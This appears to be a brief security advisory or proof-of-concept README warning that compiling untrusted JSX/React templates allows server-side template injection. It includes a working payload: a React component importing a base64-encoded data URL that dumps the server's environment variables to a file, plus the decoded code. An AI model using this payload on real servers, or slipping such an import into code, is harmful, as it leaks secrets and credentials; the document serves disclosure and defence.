You should not compile Untrusted User Template(JSX/React Component), because it will cause Remote Code Execution.
Search Word: Server Side Template Injection
export default function Home() {
import('data:text/javascript;charset=utf-8;base64,cHJvY2Vzcy5yZXBvcnQud3JpdGVSZXBvcnQoInRlc3QiLCBuZXcgRXJyb3IoSlNPTi5zdHJpbmdpZnkocHJvY2Vzcy5lbnYpKSk7IGV4cG9ydCBkZWZhdWx0IDE7').then(r => {
console.log(r)
});
return <></>
}
Raw:
process.report.writeReport("test", new Error(JSON.stringify(process.env))); export default 1;
- Stringify
process.env
- Write the env to
test
file
It will leak your server environment as a file.
References:
yarn install
yarn static-build